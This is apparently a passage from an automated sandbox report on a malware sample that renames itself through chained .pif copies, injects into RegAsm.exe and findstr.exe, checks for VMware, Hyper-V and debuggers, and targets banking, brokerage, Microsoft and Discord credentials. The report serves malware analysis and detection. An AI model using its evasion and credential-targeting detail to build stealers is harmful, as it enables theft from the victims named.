            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598652
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598469
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597688
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597575
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597462
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597322
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597071
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596647
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596498
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596373
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596136
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595674
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595542
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595413
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595252
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594965
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594641
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594510
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594385
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594277
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594156
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594027
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593909
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593793
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593546
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593209
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593078
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592969
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592859
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592750
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592587
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592476
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592374
            Source: findstr.exe, 00000012.00000002.3342067519.0000000007CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exp_monthINTEGERomVMware20,11696428655x
            Source: H0840I45.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: findstr.exe, 00000012.00000002.3342067519.0000000007CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware208655t
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3324124660.00000000013FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
            Source: H0840I45.18.drBinary or memory string: discord.comVMware20,11696428655f
            Source: H0840I45.18.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: H0840I45.18.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: H0840I45.18.drBinary or memory string: global block list test formVMware20,11696428655
            Source: findstr.exe, 00000012.00000002.3342067519.0000000007CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696428655x
            Source: H0840I45.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.0000000001372000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
            Source: 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2807069463.0000000000870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
            Source: H0840I45.18.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: H0840I45.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: H0840I45.18.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: findstr.exe, 00000012.00000002.3342067519.0000000007CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,116z
            Source: H0840I45.18.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: H0840I45.18.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: findstr.exe, 00000012.00000002.3342067519.0000000007CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20
            Source: H0840I45.18.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: H0840I45.18.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: H0840I45.18.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: H0840I45.18.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2130989636.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2433569408.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2551562808.0000000001331000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2658321483.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2823763438.000002586F4EC000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2881921941.000000000163B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3085869365.0000000001006000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
            Source: H0840I45.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: H0840I45.18.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: H0840I45.18.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: H0840I45.18.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: H0840I45.18.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: H0840I45.18.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3240615000.00000000010DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
            Source: H0840I45.18.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: H0840I45.18.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: H0840I45.18.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
            Source: H0840I45.18.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 4Ear91jgQ7.pif, 00000008.00000002.2291247580.0000000000C22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvve
            Source: H0840I45.18.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: H0840I45.18.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: H0840I45.18.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: findstr.exe, 00000012.00000002.3342067519.0000000007CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,116
            Source: H0840I45.18.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: H0840I45.18.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: H0840I45.18.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess queried: DebugPort
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F7096E rdtsc 7_2_02F7096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00417A33 LdrLoadDll,7_2_00417A33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F402E1 mov eax, dword ptr fs:[00000030h]7_2_02F402E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F402E1 mov eax, dword ptr fs:[00000030h]7_2_02F402E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F402E1 mov eax, dword ptr fs:[00000030h]7_2_02F402E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03008324 mov eax, dword ptr fs:[00000030h]7_2_03008324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03008324 mov ecx, dword ptr fs:[00000030h]7_2_03008324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03008324 mov eax, dword ptr fs:[00000030h]7_2_03008324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03008324 mov eax, dword ptr fs:[00000030h]7_2_03008324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]7_2_02F3A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]7_2_02F3A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]7_2_02F3A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]7_2_02F3A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]7_2_02F3A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0300634F mov eax, dword ptr fs:[00000030h]7_2_0300634F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F402A0 mov eax, dword ptr fs:[00000030h]7_2_02F402A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F402A0 mov eax, dword ptr fs:[00000030h]7_2_02F402A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC62A0 mov eax, dword ptr fs:[00000030h]7_2_02FC62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]7_2_02FC62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC62A0 mov eax, dword ptr fs:[00000030h]7_2_02FC62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC62A0 mov eax, dword ptr fs:[00000030h]7_2_02FC62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC62A0 mov eax, dword ptr fs:[00000030h]7_2_02FC62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC62A0 mov eax, dword ptr fs:[00000030h]7_2_02FC62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E284 mov eax, dword ptr fs:[00000030h]7_2_02F6E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E284 mov eax, dword ptr fs:[00000030h]7_2_02F6E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB0283 mov eax, dword ptr fs:[00000030h]7_2_02FB0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB0283 mov eax, dword ptr fs:[00000030h]7_2_02FB0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB0283 mov eax, dword ptr fs:[00000030h]7_2_02FB0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0274 mov eax, dword ptr fs:[00000030h]7_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F34260 mov eax, dword ptr fs:[00000030h]7_2_02F34260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F34260 mov eax, dword ptr fs:[00000030h]7_2_02F34260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F34260 mov eax, dword ptr fs:[00000030h]7_2_02F34260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2826B mov eax, dword ptr fs:[00000030h]7_2_02F2826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2A250 mov eax, dword ptr fs:[00000030h]7_2_02F2A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36259 mov eax, dword ptr fs:[00000030h]7_2_02F36259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEA250 mov eax, dword ptr fs:[00000030h]7_2_02FEA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEA250 mov eax, dword ptr fs:[00000030h]7_2_02FEA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB8243 mov eax, dword ptr fs:[00000030h]7_2_02FB8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB8243 mov ecx, dword ptr fs:[00000030h]7_2_02FB8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2823B mov eax, dword ptr fs:[00000030h]7_2_02F2823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]7_2_02F4E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]7_2_02F4E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]7_2_02F4E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F663FF mov eax, dword ptr fs:[00000030h]7_2_02F663FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F403E9 mov eax, dword ptr fs:[00000030h]7_2_02F403E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F403E9 mov eax, dword ptr fs:[00000030h]7_2_02F403E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F403E9 mov eax, dword ptr fs:[00000030h]7_2_02F403E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F403E9 mov eax, dword ptr fs:[00000030h]7_2_02F403E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F403E9 mov eax, dword ptr fs:[00000030h]7_2_02F403E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F403E9 mov eax, dword ptr fs:[00000030h]7_2_02F403E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F403E9 mov eax, dword ptr fs:[00000030h]7_2_02F403E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F403E9 mov eax, dword ptr fs:[00000030h]7_2_02F403E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE3DB mov eax, dword ptr fs:[00000030h]7_2_02FDE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE3DB mov eax, dword ptr fs:[00000030h]7_2_02FDE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]7_2_02FDE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE3DB mov eax, dword ptr fs:[00000030h]7_2_02FDE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD43D4 mov eax, dword ptr fs:[00000030h]7_2_02FD43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD43D4 mov eax, dword ptr fs:[00000030h]7_2_02FD43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEC3CD mov eax, dword ptr fs:[00000030h]7_2_02FEC3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]7_2_02F3A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]7_2_02F3A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]7_2_02F3A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]7_2_02F3A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]7_2_02F3A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]7_2_02F3A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F383C0 mov eax, dword ptr fs:[00000030h]7_2_02F383C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F383C0 mov eax, dword ptr fs:[00000030h]7_2_02F383C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F383C0 mov eax, dword ptr fs:[00000030h]7_2_02F383C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F383C0 mov eax, dword ptr fs:[00000030h]7_2_02F383C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB63C0 mov eax, dword ptr fs:[00000030h]7_2_02FB63C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0300625D mov eax, dword ptr fs:[00000030h]7_2_0300625D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F28397 mov eax, dword ptr fs:[00000030h]7_2_02F28397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F28397 mov eax, dword ptr fs:[00000030h]7_2_02F28397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F28397 mov eax, dword ptr fs:[00000030h]7_2_02F28397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E388 mov eax, dword ptr fs:[00000030h]7_2_02F2E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E388 mov eax, dword ptr fs:[00000030h]7_2_02F2E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E388 mov eax, dword ptr fs:[00000030h]7_2_02F2E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5438F mov eax, dword ptr fs:[00000030h]7_2_02F5438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5438F mov eax, dword ptr fs:[00000030h]7_2_02F5438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD437C mov eax, dword ptr fs:[00000030h]7_2_02FD437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB035C mov eax, dword ptr fs:[00000030h]7_2_02FB035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB035C mov eax, dword ptr fs:[00000030h]7_2_02FB035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB035C mov eax, dword ptr fs:[00000030h]7_2_02FB035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB035C mov ecx, dword ptr fs:[00000030h]7_2_02FB035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB035C mov eax, dword ptr fs:[00000030h]7_2_02FB035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB035C mov eax, dword ptr fs:[00000030h]7_2_02FB035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFA352 mov eax, dword ptr fs:[00000030h]7_2_02FFA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD8350 mov ecx, dword ptr fs:[00000030h]7_2_02FD8350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
